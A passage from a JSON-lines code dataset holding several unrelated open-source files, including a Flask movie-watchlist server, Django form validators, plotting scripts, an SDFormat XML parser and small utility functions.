media[0][\"media_poster_path\"]\n info[\"link\"] = '/mediaInfo/' + media[0][\"media_type\"] + '/' + watching[i]\n\n watching_info.append(info)\n \n will_watch = db.get_user_media_for_list(str(session['profile']['user_id']), \"will_watch\")\n will_watch_info = []\n for i in range(len(will_watch)):\n info = {}\n\n media = db.get_media_by_id(will_watch[i])\n info['id'] = will_watch[i]\n info[\"title\"] = media[0][\"media_title\"]\n info[\"poster\"] = media[0][\"media_poster_path\"]\n info[\"link\"] = '/mediaInfo/' + media[0][\"media_type\"] + '/' + will_watch[i]\n\n will_watch_info.append(info)\n\n user_profile = db.get_user_by_id(str(session['profile']['user_id']))\n\n return render_template('profile.html', watched_info=watched_info, watching_info=watching_info, will_watch_info=will_watch_info, \\\n isLoggedIn=loggedInInfo['isLoggedIn'], profilePicture=loggedInInfo['profilePicture'], email=loggedInInfo['email'], user_profile = user_profile)\n\n@app.route('/mediaInfo//', methods=['GET'])\n@logged_in\ndef mediaInfo(media_type, media_id, loggedInInfo):\n session['return_url'] = request.url\n mediaData = None\n if (media_type == \"movie\"):\n mediaData = tmdb.query_by_movie_id(media_id)\n elif (media_type == \"tv\"):\n mediaData = tmdb.query_by_tv_id(media_id)\n \n if (mediaData == None):\n abort(404, description=\"Media ID: \" + media_id + \",Media Type:\" + media_type + \" not found\")\n mediaData.update({\"media_type\": media_type})\n\n if (media_type == \"movie\"):\n castData = tmdb.query_cast_info_by_movie_id(media_id, 6)\n elif (media_type == \"tv\"):\n castData = tmdb.query_cast_info_by_tv_id(media_id, 6)\n \n watchlistCounts = db.get_watchlist_count_by_media_id(media_id)\n\n \n # Show related users, check if media is already in one of user's watchlists\n if (loggedInInfo['isLoggedIn']):\n users_id = db.get_users_by_media(media_id, session['profile']['user_id'], True)\n added = db.is_media_in_user(media_id, session['profile']['user_id'])\n if (added[0]):\n if (added[1] == 'will_watch'):\n addedList = \"Want to Watch\"\n elif (added[1] == 'watching'):\n addedList = \"Watching\"\n elif (added[1] == 'watched'):\n addedList = \"Watched\"\n else:\n addedList = 'null'\n 
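# anonymous visitors get the related users without any per-user list flags\n 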
else:\n users_id = db.get_users_by_media(media_id, None, False)\n addedList = 'null'\n \n watched_users = []\n for user in users_id[:4]:\n # if (user[\"user_id\"] == session['profile']['user_id']):\n # continue\n user_info={}\n result = db.get_user_by_id(user[\"user_id\"])\n user_info[\"info\"] = result[0]\n user_info[\"link\"] = '/user/' + result[0][\"user_id\"]\n watched_users.append(user_info)\n current_app.logger.info(result)\n\n return render_template('mediaInfo.html', mediaData = mediaData, castData = castData, watchlistCounts = watchlistCounts, \\\n isLoggedIn=loggedInInfo['isLoggedIn'], profilePicture=loggedInInfo['profilePicture'], email=loggedInInfo['email'], watched_users = watched_users,\n addedList = addedList)\n\n@app.errorhandler(404)\n@logged_in\ndef page_not_found(e, loggedInInfo):\n return render_template('/error/404.html', errorStr=e, isLoggedIn=loggedInInfo['isLoggedIn'], profilePicture=loggedInInfo['profilePicture'], email=loggedInInfo['email']), 404\n\n@app.errorhandler(405)\n@logged_in\ndef method_not_allowed(e, loggedInInfo):\n return render_template('/error/405.html', errorStr=e, isLoggedIn=loggedInInfo['isLoggedIn'], profilePicture=loggedInInfo['profilePicture'], email=loggedInInfo['email']), 405\n\n\n@app.route('/update_list', methods=['POST'])\n@requires_auth\ndef update_list():\n user = str(session['profile']['user_id'])\n id = request.form['media_id']\n start = request.form['start']\n end = request.form['end']\n db.update_list_db(user, id, start, end)\n return redirect(url_for('profile'))\n\n@app.route('/remove_from_list', methods=['POST'])\n@requires_auth\ndef remove_from_list():\n user = str(session['profile']['user_id'])\n id = request.form['mediaID']\n if (request.form['addedList'] == \"Want to Watch\"):\n start = \"will_watch\"\n else:\n start = request.form['addedList'].lower()\n current_app.logger.info(\"attempting to delete \" + id + \" from \" + start)\n end = \"delete\"\n db.update_list_db(user, id, start, end)\n return redirect(session['return_url'])\n\n\n@app.route('/update_bio', methods=['POST'])\n@requires_auth\ndef update_bio():\n bio_text=request.form.get('bio')\n user_id = str(session['profile']['user_id'])\n db.update_bio(user_id, bio_text)\n return redirect(url_for('profile'))\n\n\n@app.route('/user/', methods=['GET'])\n@logged_in\ndef publicProfile(user_id, loggedInInfo):\n if (len(db.get_user_by_id(user_id)) == 0):\n abort(404, description=\"User ID: \" + user_id + \" not found\")\n\n if (not loggedInInfo['isLoggedIn'] or session['profile']['user_id'] != user_id): #if user is not logged in or if user is not accessing their own user page\n session['return_url'] = request.url\n\n watched = db.get_user_media_for_list(str(user_id), \"watched\")\n watched_info = []\n for i in range(len(watched)):\n info = {}\n\n media = db.get_media_by_id(watched[i])\n info['id'] = watched[i]\n info[\"title\"] = media[0][\"media_title\"]\n info[\"poster\"] = media[0][\"media_poster_path\"]\n info[\"link\"] = '/mediaInfo/' + media[0][\"media_type\"] + '/' + watched[i]\n\n watched_info.append(info)\n\n watching = db.get_user_media_for_list(str(user_id), \"watching\")\n watching_info = []\n for i in range(len(watching)):\n info = {}\n\n media = db.get_media_by_id(watching[i])\n info['id'] = watching[i]\n info[\"title\"] = media[0][\"media_title\"]\n info[\"poster\"] = media[0][\"media_poster_path\"]\n info[\"link\"] = '/mediaInfo/' + media[0][\"media_type\"] + '/' + watching[i]\n\n watching_info.append(info)\n\n will_watch = 
db.get_user_media_for_list(str(user_id), \"will_watch\")\n will_watch_info = []\n for i in range(len(will_watch)):\n info = {}\n\n media = db.get_media_by_id(will_watch[i])\n info['id'] = will_watch[i]\n info[\"title\"] = media[0][\"media_title\"]\n info[\"poster\"] = media[0][\"media_poster_path\"]\n info[\"link\"] = '/mediaInfo/' + media[0][\"media_type\"] + '/' + will_watch[i]\n\n will_watch_info.append(info)\n\n user_profile = db.get_user_by_id(str(user_id))\n\n is_followed = False\n if (loggedInInfo['isLoggedIn']):\n followees = db.get_followee_ids_by_user_id(session['profile']['user_id'])\n if (user_profile[0]['user_id'] in followees):\n is_followed = True\n\n return render_template('publicProfile.html', watched_info=watched_info, watching_info=watching_info, will_watch_info=will_watch_info, \\\n isLoggedIn=loggedInInfo['isLoggedIn'], profilePicture=loggedInInfo['profilePicture'], email=loggedInInfo['email'], user_profile=user_profile, is_followed=is_followed)\n\n else: #if user is trying to access their own user page, redirect to profile\n return redirect(url_for('profile'))\n \n@app.route('/following')\n@logged_in\n@requires_auth\ndef following(loggedInInfo):\n session['return_url'] = request.url\n followees = db.get_followees_by_user_id_sorted_by_username(session['profile']['user_id'])\n # followees = db.get_users_by_ids(followees)\n\n return render_template('following.html', isLoggedIn=loggedInInfo['isLoggedIn'], profilePicture=loggedInInfo['profilePicture'], email=loggedInInfo['email'], \\\n followees=followees)\n\n@app.route('/add_new_follow', methods=['POST'])\n@requires_auth\ndef add_new_follow():\n followee_id = request.form.get('followee')\n db.add_new_follow(session['profile']['user_id'], followee_id)\n return redirect(session['return_url'])\n\n@app.route('/unfollow', methods=['POST'])\n@requires_auth\ndef unfollow():\n followee_id = request.form.get('followee')\n db.unfollow(session['profile']['user_id'], followee_id)\n return redirect(session['return_url'])\n\n# @app.route('/parent')\n# def parent():\n# return render_template('parent.html')\n\n\n","repo_name":"hamma212/movie-watchlist-sharing","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":20214,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"16575022365","text":"from django import forms\nfrom project.pinnmodels import UmOscAllActiveAcctNbrsV, UmOscServiceProfileV\nfrom oscauth.utils import get_mc_group, get_mc_user\nfrom oscauth.models import AuthUserDept\n\nfrom project.models import validate_shortcode\n\nfrom django.core.exceptions import ValidationError\n\n\nclass Phone(forms.CharField):\n template_name = 'project/text.html'\n widget=forms.TextInput(attrs={'class': 'form-control'})\n\n def validate(self, value):\n value = value.replace('-','')\n locations = list(UmOscServiceProfileV.objects.filter(service_number=value).exclude(location_id=0).values())\n\n if locations:\n authorized_departments = AuthUserDept.get_order_departments(self.current_user)\n phone_dept = locations[0]['deptid']\n authorized = False\n\n for dept in authorized_departments:\n if dept.dept == phone_dept:\n authorized = True\n\n if authorized:\n return\n else:\n self.widget.attrs.update({'class': 'form-control is-invalid'})\n raise ValidationError(f'You are not authorized for department {phone_dept}', code='shortcode')\n else:\n self.widget.attrs.update({'class': 'form-control is-invalid'})\n raise ValidationError('That is not a valid Phone Number', 
code='shortcode')\n\n\nclass Uniqname(forms.CharField):\n\n template_name = 'project/text.html'\n widget=forms.TextInput(attrs={'class': 'form-control'})\n\n def validate(self, value):\n if not value and not self.required:\n return\n\n user = get_mc_user(value)\n if user:\n return\n else:\n self.widget.attrs.update({'class': 'form-control is-invalid'})\n raise ValidationError('That is not a valid uniqname', code='shortcode')\n\n\nclass ShortCode(forms.CharField):\n template_name = 'project/text.html'\n widget=forms.TextInput(attrs={'class': 'form-control'})\n #validators=[validate_shortcode]\n\n #def validate(self, value):\n\n # try:\n # UmOscAllActiveAcctNbrsV.objects.get(short_code=value)\n # except:\n # self.widget.attrs.update({'class': 'form-control is-invalid'})\n # raise ValidationError('That is not a valid shortcode', code='shortcode')\n\n\nclass McGroup(forms.CharField):\n #widget = forms.EmailInput\n #default_validators = [validators.validate_email]\n template_name = 'project/text.html'\n\n widget=forms.TextInput(attrs={'class': 'form-control'})\n\n def validate(self, value):\n\n if not get_mc_group(value):\n self.widget.attrs.update({'class': 'form-control is-invalid'})\n raise ValidationError('That is not a valid group in MCommunity', code='mcgroup')\n\n\n\n","repo_name":"ITSComm-Information-Systems/srs","sub_path":"project/forms/fields.py","file_name":"fields.py","file_ext":"py","file_size_in_byte":2773,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"31824261228","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport numpy as np\nimport matplotlib.pyplot as pl\nfrom matplotlib import rcParams\nfrom matplotlib.colors import ListedColormap\n\nfrom astropy.io import fits\n\nfrom archer.config import parser, rectify_config, plot_defaults\nfrom archer.catalogs import rectify, homogenize\nfrom archer.frames import gc_frame_law10, gc_frame_dl17\nfrom archer.plummer import convert_estar_rmax\n\n\ndef show_dlam(cat_r, show, ax=None, colorby=None, randomize=True,\n **scatter_kwargs):\n if randomize:\n rand = np.random.choice(show.sum(), size=show.sum(), replace=False)\n else:\n rand = slice(None)\n rgal = np.sqrt(cat_r[\"x_gal\"]**2 + cat_r[\"y_gal\"]**2 + cat_r[\"z_gal\"]**2)\n #rgal = cat_r[\"dist\"]\n cb = ax.scatter(cat_r[show][rand][\"lambda\"], rgal[show][rand],\n c=colorby[show][rand], **scatter_kwargs)\n return ax, cb\n\n\nif __name__ == \"__main__\":\n\n zcut = -1.9\n config = rectify_config(parser.parse_args())\n rtype = config.rcat_type\n\n # rcat\n rcat = fits.getdata(config.rcat_file)\n rcat_r = rectify(homogenize(rcat, rtype, gaia_vers=config.gaia_vers), config.gc_frame)\n\n # lm10\n lm10 = fits.getdata(config.lm10_file)\n lm10_r = rectify(homogenize(lm10, \"LM10\"), gc_frame_law10)\n rmax, energy = convert_estar_rmax(lm10[\"estar\"])\n\n # dl17\n dl17 = fits.getdata(config.dl17_file)\n dl17_r = rectify(homogenize(dl17, \"DL17\"), gc_frame_dl17)\n\n # selections\n from make_selection import rcat_select\n good, sgr = rcat_select(rcat, rcat_r, max_rank=config.max_rank,\n dly=config.dly, flx=config.flx)\n unbound = lm10[\"tub\"] > 0\n\n # plot setup\n rcParams = plot_defaults(rcParams)\n text = [0.9, 0.1]\n bbox = dict(facecolor='white')\n zmin, zmax = -2, -0.1\n ncol = 3\n figsize = (11, 9.5)\n fig = pl.figure(figsize=figsize)\n from matplotlib.gridspec import GridSpec\n gs = GridSpec(ncol, 1, height_ratios=ncol * [10],\n left=0.1, right=0.87, hspace=0.2, top=0.93)\n gsc = GridSpec(ncol, 1, left=0.89, 
right=0.9, hspace=0.2, top=0.93)\n #bottom=0.89, top=0.95)\n vlaxes = []\n\n # --- plot H3 ----\n vlaxes.append(fig.add_subplot(gs[0, 0]))\n ax = vlaxes[-1]\n show = good & sgr\n ax, cbh = show_dlam(rcat_r, show, ax=ax, colorby=rcat[\"feh\"],\n vmin=zmin, vmax=zmax, cmap=\"magma\",\n marker='o', s=4, alpha=1.0, zorder=2, linewidth=0)\n ax.text(text[0], text[1], \"H3 Giants\", transform=ax.transAxes, bbox=bbox)\n # highlight low feh\n show = good & sgr & (rcat[\"FeH\"] < zcut)\n ax, cbh = show_dlam(rcat_r, show, ax=ax, colorby=rcat[\"feh\"],\n vmin=zmin, vmax=zmax, cmap=\"magma\",\n marker='o', s=9, alpha=1.0, zorder=3, linewidth=0,)\n #label=\"[Fe/H] < {}\".format(zcut))\n\n # --- LM10 Mocks ---\n ax = fig.add_subplot(gs[1, 0], sharey=vlaxes[0], sharex=vlaxes[0])\n vlaxes.append(ax)\n colorby, cname = 0.66*0.85*rmax, r\"$\\hat{\\rm R}_{\\rm prog}$ (kpc)\" #r\"typical radius ($\\sim 0.66 \\, r_{\\rm max}/r_0$)\"\n vmin, vmax = 0.25, 2.5\n #colorby, cname = lm10[\"Estar\"], r\"E$_\\ast$\"\n #vmin, vmax = 0, 1\n show = unbound\n ax, cbl = show_dlam(lm10_r, show, ax=ax, colorby=colorby,\n vmin=vmin, vmax=vmax, cmap=\"magma_r\",\n marker='o', linewidth=0, alpha=0.5, s=2)\n ax.text(text[0], text[1], \"LM10\\n(noiseless)\", transform=ax.transAxes, bbox=bbox)\n\n # --- DL17 Mock ---\n ax = fig.add_subplot(gs[2, 0], sharey=vlaxes[0], sharex=vlaxes[0])\n vlaxes.append(ax)\n cm = ListedColormap([\"tomato\", \"black\"])\n show = dl17[\"id\"] >= 0\n ax, cbd = show_dlam(dl17_r, show, ax=ax, colorby=dl17[\"id\"],\n vmin=0, vmax=1, cmap=cm, #norm=norm,\n marker='o', linewidth=0, alpha=1.0, s=4)\n\n ax.text(text[0], text[1], \"DL17\\n(noiseless)\", transform=ax.transAxes, bbox=bbox)\n\n # prettify\n [ax.set_xlim(-5, 365) for ax in vlaxes]\n [ax.set_ylim(0, 90) for ax in vlaxes]\n [ax.set_ylabel(r\"$R_{\\rm GC}$ (kpc)\") for ax in vlaxes]\n [ax.set_xlabel(r\"$\\Lambda_{\\rm Sgr}$ (deg)\") for ax in vlaxes[-1:]]\n from matplotlib.lines import Line2D\n points = Line2D([], [], linestyle=\"\", color=\"black\",\n marker=\"o\", markersize=3)\n vlaxes[0].legend([points], [\"[Fe/H] < {}\".format(zcut)], loc=\"upper right\")\n\n # ---- Colorbars ----\n cax1 = fig.add_subplot(gsc[1, -1])\n #pl.colorbar(cb, cax=cax, label=r\"$t_{unbound}$ (Gyr)\")\n pl.colorbar(cbl, cax=cax1, label=cname)\n cax2 = fig.add_subplot(gsc[0, -1])\n pl.colorbar(cbh, cax=cax2, label=r\"[Fe/H]\")\n cax3 = fig.add_subplot(gsc[2, -1])\n pl.colorbar(cbd, cax=cax3, label=r\"\", ticks=[0.25, 0.75])\n cax3.set_yticklabels([\"Stars\", \"DM\"])\n\n if config.savefig:\n fig.savefig(\"{}/dist_lambda_mocks.{}\".format(config.figure_dir, config.figure_extension),\n dpi=config.figure_dpi)\n","repo_name":"bd-j/archer","sub_path":"plotting/dist_lambda_mocks.py","file_name":"dist_lambda_mocks.py","file_ext":"py","file_size_in_byte":5025,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"43"} +{"seq_id":"32599992670","text":"\ndef detectCapitalUse(word: str) -> bool:\n # capital usage is correct when the word is all caps, all lowercase,\n # or only the first letter is capitalized\n if word.isupper() or word.islower():\n return True\n return word[0].isupper() and word[1:].islower()\n","repo_name":"lukkelele/python","sub_path":"leetcode/detect_capital.py","file_name":"detect_capital.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"73223432449","text":"'''\nPlease 
keep the imports in alphabetical order for better organization\n'''\n\nfrom ..models import Person\nfrom django.contrib.auth.decorators import login_required\nfrom django.shortcuts import get_object_or_404, redirect, render\nfrom django.urls import reverse_lazy\n\n@login_required\ndef person_delete(request, id):\n person = get_object_or_404(Person, pk=id)\n \n if request.method == 'POST':\n person.delete()\n return redirect(reverse_lazy(\n 'person_list'\n ))\n\n context = {\n 'person': person,\n }\n\n return render(\n request,\n 'person_delete.html',\n context\n )","repo_name":"flavionogueiraa/django_curse","sub_path":"clientes/views/person_delete.py","file_name":"person_delete.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"40531167060","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\n#rewards look fully converged by then, so truncate at 500 episodes\navg_rewards = np.load('/Users/koshikawashunpei/Documents/高橋研/JSAI/プロットコード/plot_data/maze_plot_algorithm.npy')[:,:500]\n\n#plotting section\nfig, ax = plt.subplots(figsize = [12, 8])\n\n#plot of all algorithms\n\"\"\"\nlabel = ['ε-greedy', 'RS', 'RS GS interval: 1', 'RS(λ)', 'RS(λ) GS interval: 1']\nfor i in range(5):\n ax.plot(avg_rewards[i], label = label[i])\n\"\"\"\n\n#plot of RS vs RS GS\n\"\"\"\nax.plot(avg_rewards[1], label = 'RS', color = 'tab:orange')\nax.plot(avg_rewards[2], label = 'RS GS interval: 1', color = 'tab:green')\n\"\"\"\n\n#plot of RS(λ) vs RS(λ) GS\n\nax.plot(avg_rewards[3], label = 'RS(λ)', color = 'tab:red')\nax.plot(avg_rewards[4], label = 'RS(λ) GS interval: 1', color = 'tab:purple')\n\n\nax.tick_params(axis = 'x', labelsize = 25)\nax.tick_params(axis = 'y', labelsize = 25)\nax.set_title('Maze task', fontsize = 30)\nax.set_xlabel('Episode', fontsize = 30)\nax.set_ylabel('Rewards', fontsize = 30)\nax.legend(loc = 'lower right', fontsize = 30)\n\nplt.show()\n","repo_name":"syunsukeA/GRC","sub_path":"plot_tools/show_maze_plot_algorithm.py","file_name":"show_maze_plot_algorithm.py","file_ext":"py","file_size_in_byte":1100,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"74254545090","text":"from xml.etree import ElementTree\nfrom xsdata.formats.dataclass import parsers\nfrom xsdata.formats.dataclass.context import XmlContext\nfrom xsdata.formats.dataclass.parsers import XmlParser\nfrom xsdata.formats.dataclass.parsers.config import ParserConfig\nfrom xsdata.formats.dataclass.serializers import XmlSerializer\nfrom xsdata.formats.dataclass.serializers.config import SerializerConfig\nfrom xsdata.formats.dataclass.parsers import handlers\nfrom xsdata.exceptions import ParserError as XSDataParserError\nimport io\nfrom typing import Dict, Callable, Type, TypeVar\nimport importlib\nimport warnings\nfrom .exceptions import ParseError\n\n\nT = TypeVar(\"T\")\n\n# available SDF elements by version\n_parser_roots = {\n \"1.0\": \"..bindings.v10\",\n \"1.2\": \"..bindings.v12\",\n \"1.3\": \"..bindings.v13\",\n \"1.4\": \"..bindings.v14\",\n \"1.5\": \"..bindings.v15\",\n \"1.6\": \"..bindings.v16\",\n \"1.7\": \"..bindings.v17\",\n \"1.8\": \"..bindings.v18\",\n}\n\n# recommended to reuse the same parser context\n# see: https://xsdata.readthedocs.io/en/latest/xml.html\nxml_ctx = XmlContext()\n\n\ndef get_version(sdf: str) -> str:\n \"\"\"Returns the version of an SDF string.\n\n Parameters\n ----------\n sdf : str\n The SDFormat XML to be parsed.\n\n Returns\n -------\n version : str\n A string containing the SDF 
version, e.g. \"1.8\".\n\n Notes\n -----\n This function only checks the root tag and does not parse the entire string.\n\n Examples\n --------\n .. minigallery:: skbot.ignition.sdformat.get_version\n\n \"\"\"\n\n parser = ElementTree.iterparse(io.StringIO(sdf), events=(\"start\",))\n\n _, root = next(parser)\n\n if root.tag != \"sdf\":\n raise ParseError(\"SDF root element not found.\")\n\n if \"version\" in root.attrib:\n version = root.attrib[\"version\"]\n if version not in _parser_roots.keys():\n raise ParseError(f\"Invalid version: {version}\")\n return root.attrib[\"version\"]\n else:\n raise ParseError(\"SDF doesn't specify a version.\")\n\n\ndef loads(\n sdf: str,\n *,\n version: str = None,\n custom_constructor: Dict[Type[T], Callable] = None,\n handler: str = None,\n):\n \"\"\"Convert an XML string into a sdformat.models tree.\n\n Parameters\n ----------\n sdf : str\n The SDFormat XML to be parsed.\n version : str\n The SDFormat version to use while parsing. If None (default) it will\n automatically determine the version from the element. If specified\n the given version will be used instead.\n custom_constructor : Dict[Type[T], Callable]\n Overwrite the default constructor for a certain model class with a\n callable. This is useful for doing pre- or post-initialization of\n bound classes or to replace them entirely.\n handler : str\n The handler that the parser should use when traversing the XML. If\n unspecified the default xsData parser will be used (lxml if it is\n installed, otherwise xml.etree). Possible values are:\n\n \"XmlEventHandler\"\n An xml.etree event-based handler.\n \"LxmlEventHandler\"\n An lxml.etree event-based handler.\n\n Returns\n -------\n SdfRoot : object\n An instance of ``skbot.ignition.models.vXX.Sdf`` where XX corresponds to the\n version of the SDFormat XML.\n\n Notes\n -----\n ``custom_constructor`` is currently disabled and has no effect. It will\n become available with xsData v21.8.\n\n Examples\n --------\n .. minigallery:: skbot.ignition.sdformat.loads\n\n \"\"\"\n\n if custom_constructor is None:\n custom_constructor = dict()\n\n def custom_class_factory(clazz, params):\n if clazz in custom_constructor:\n return custom_constructor[clazz](**params)\n\n return clazz(**params)\n\n if version is None:\n version = get_version(sdf)\n\n if handler in [\"XmlSaxHandler\", \"LxmlSaxHandler\"]:\n warnings.warn(\n \"SAX handlers have been deprecated in xsData >= 21.9;\"\n \" falling back to EventHandler. 
If you need the SAX handler, please open an issue.\"\n \" To make this warning disappear change `handler` to the corresponding EventHandler.\",\n DeprecationWarning,\n )\n\n if handler == \"XmlSaxHandler\":\n handler = \"XmlEventHandler\"\n elif handler == \"LxmlSaxHandler\":\n handler = \"LxmlEventHandler\"\n\n handler_class = {\n None: handlers.default_handler(),\n \"XmlEventHandler\": handlers.XmlEventHandler,\n \"LxmlEventHandler\": handlers.LxmlEventHandler,\n }[handler]\n\n binding_location = _parser_roots[version]\n\n bindings = importlib.import_module(binding_location, __name__)\n\n sdf_parser = XmlParser(\n ParserConfig(class_factory=custom_class_factory),\n context=xml_ctx,\n handler=handler_class,\n )\n\n try:\n root_el = sdf_parser.from_string(sdf, bindings.Sdf)\n except XSDataParserError as e:\n raise ParseError(\"Invalid SDFormat XML.\") from e\n\n return root_el\n\n\ndef dumps(root_element, *, format=False) -> str:\n \"\"\"Serialize an SDFormat object to an XML string.\n\n Parameters\n ----------\n root_element : object\n An instance of ``skbot.ignition.models.vXX.Sdf``. XX represents the SDFormat\n version and can be any version currently supported by scikit-bot.\n format : bool\n If true, add indentation and linebreaks to the output to increase human\n readability. If false (default) the entire XML will appear as a single\n line with no spaces between elements.\n\n Returns\n -------\n sdformat_string : str\n A string containing SDFormat XML representing the given input.\n\n Examples\n --------\n .. minigallery:: skbot.ignition.sdformat.dumps\n\n \"\"\"\n serializer = XmlSerializer(config=SerializerConfig(pretty_print=format))\n\n return serializer.render(root_element)\n","repo_name":"FirefoxMetzger/scikit-bot","sub_path":"skbot/ignition/sdformat/sdformat.py","file_name":"sdformat.py","file_ext":"py","file_size_in_byte":5883,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"43"} +{"seq_id":"3766307724","text":"from enum import Enum\n\nfrom colour import Color\nfrom scipy.sparse.construct import rand\nfrom utility.color import mix\nimport random\nimport math\n\nclass DefaultColorPallet(Enum):\n USER_COLOR = (\"#45e9ce\",\"#1fbfff\")\n SUBREDDIT_COLOR = \"#e94560\"\n FONT_COLOR =\"#fefefe\"\n BACKGROUND_COLOR =\"#121220\"\n EDGE_COLOR = (\"#3e5c7f\",\"#ff5f1f\")\n\nclass ColorPallet:\n __colors:list[Color]\n def __init__(self, colors: list[Color]) -> None:\n self.__colors = colors\n\n def get(self,idx:int)->Color:\n assert(idx >= 0 and idx < len(self.__colors))\n return self.__colors[idx]\n\n def length(self):\n return len(self.__colors)\n\n @staticmethod\n def random(size: int, make_neon: bool, mix_base: Color = Color(rgb=(1.0,1.0,1.0))):\n colors: list[Color] = []\n \n for _ in range(0,size):\n col = Color(rgb=(random.random(),\n random.random(),\n random.random()))\n col = mix(col,mix_base)\n\n if make_neon:\n h,s,l = col.get_hsl()\n s = random.randint(85,100)/100\n l = random.randint(50,60)/100\n col = Color(hsl=(h,s,l))\n colors.append(col)\n return ColorPallet(colors)\n\n @staticmethod\n def even_dist_hsl_neon(size: int):\n colors: list[Color] = []\n\n step = 0.93 / size\n\n for i in range(0,size):\n h = i * step\n if h > 1.0:\n h = 1.0\n colors.append(Color(hsl=( h, random.randint(85,100)/100, random.randint(50,60)/100))) \n return 
ColorPallet(colors)\n\n\n","repo_name":"Ignaz503/Socialmedia-Tech-2021","sub_path":"utility/colorpallet.py","file_name":"colorpallet.py","file_ext":"py","file_size_in_byte":1442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"27642327960","text":"import torch\n\n\nclass Cppn:\n    def __init__(self, genome):\n        self._nodes = list(genome.nodes.values())\n        self._vertical_nodes = list(genome.vertical_nodes.values())\n        self._center_nodes = list(genome.center_nodes.values())\n        self._vertical_bias = genome.vertical_bias\n        self._horizontal_bias = genome.horizontal_bias\n        self._center_bias = genome.center_bias\n\n    def get_weights(self, x_in, y_in, x_out, y_out):\n        output = torch.zeros_like(x_in)\n        for n in self._nodes:\n            zx_out = x_out * n.zoom\n            zy_out = y_out * n.zoom\n            dx = x_in - zx_out\n            dy = y_in - zy_out\n            d2 = dx * dx + dy * dy\n            output += torch.exp(-d2 / n.scale / n.scale) * n.weight\n        idx = ((x_out == 0) & (y_out != 0))\n        for n in self._vertical_nodes:\n            zx_out = x_out * n.zoom\n            zy_out = y_out * n.zoom\n            dx = x_in - zx_out\n            dy = y_in - zy_out\n            d2 = dx * dx + dy * dy\n            output += torch.exp(-d2 / n.scale / n.scale) * n.weight * idx\n        d2 = x_in * x_in + y_in * y_in\n        idx = ((x_out == 0) & (y_out == 0))\n        for n in self._center_nodes:\n            output += torch.exp(-d2 / n.scale / n.scale) * n.weight * idx\n        return output\n\n    def get_biases(self, x_in, y_in, x_out, y_out):\n        output = torch.zeros_like(x_in)\n        idx = ((x_out == 0) & (y_out != 0))\n        output[idx] = self._vertical_bias.bias\n        idx = ((x_out != 0) & (y_out == 0))\n        output[idx] = self._horizontal_bias.bias\n        idx = ((x_out == 0) & (y_out == 0))\n        output[idx] = self._center_bias.bias\n        return output\n","repo_name":"ykeuter/flightevo","sub_path":"src/flightevo/cppn.py","file_name":"cppn.py","file_ext":"py","file_size_in_byte":1685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"12938701879","text":"import click\nimport peewee\nimport model\nimport sqlite3\nimport pickle\nimport utils\n\n@click.group(context_settings={'max_content_width': 400})\n@click.pass_context\ndef cli(ctx):\n    pass\n\n\n@cli.command(help=\"Creates database.\")\ndef db():\n    model.init()\n\n\n@cli.command(help=\"Executes a raw TEXT analysis of a title.\")\n@click.argument('known_db_path')\n@click.argument('text_path')\ndef raw_analysis(text_path, known_db_path):\n    known_db = utils.get_known_db(known_db_path)\n    title = utils._generate_title_morphs(text_path, text_path.split(\"/\")[-1])\n    title.print_evaluation(known_db)\n\n\n@cli.command(help=\"Looks into folders and files of a path, and creates a morphdata file based on all. Single-core process\")\n@click.argument('text_path')\n@click.argument('title_name')\n@click.argument('output_folder')\ndef generate_title_morphs(text_path, title_name, output_folder):\n    utils.create_morph_file(utils._generate_title_morphs(\n        text_path, title_name), title_name, output_folder)\n\n\n@cli.command(help=\"\"\"\nLooks into folders and files of a path, and creates a morphdata for each. Each folder is handled as a title. Each file on root level of the collection path is handled as a title. 
Multi-core process\\n\"\"\")\n@click.argument('collection_path')\n@click.argument('output_folder')\ndef generate_collection_morphs(collection_path, output_folder):\n    utils._generate_collection_morphs(collection_path, output_folder)\n\n\n@cli.command(help=\"Evaluates the readability of a single morphdata file.\")\n@click.argument('known_db_path')\n@click.argument('morphdata_path')\ndef evaluate_title_morphs(known_db_path, morphdata_path):\n    known_db = utils.get_known_db(known_db_path)\n\n    if morphdata_path.endswith(\"morphdata\"):\n        title = pickle.load(open(morphdata_path, 'rb'))\n        title.print_evaluation(known_db)\n\n\n@cli.command(help=\"Evaluates the readability of all the morphdata files in a single folder.\")\n@click.argument('known_db_path')\n@click.argument('collection_path')\ndef evaluate_collection_morphs(known_db_path, collection_path):\n    print(into_csv(utils._evaluate_collection_morphs(collection_path, known_db_path)))\n\n\nif __name__ == '__main__':\n    cli()\n","repo_name":"noreadingability/readability","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2143,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"20521004999","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# ## Exercise 1\n\n# In[ ]:\n\n\n# Write a program that asks the user to enter a distance in miles, then converts\n# that distance to Kilometer and presents the kilometers.\n# The conversion formula is as follows: Miles=Kilometers×0.6214\n\n\n# In[2]:\n\n\ndef Miles_Converter(): # by using the miles converter function it will display the distance in kilometer for the user input distance in miles\n    \n    miles = float(input(\"ENTER THE VALUE FOR THE DISTANCE IN MILES : \"))\n    km = miles / 0.6214\n    print (\"THE DISTANCE IN KILOMETER IS: \", km)\n    return km\n    \n    \nMiles_Converter() 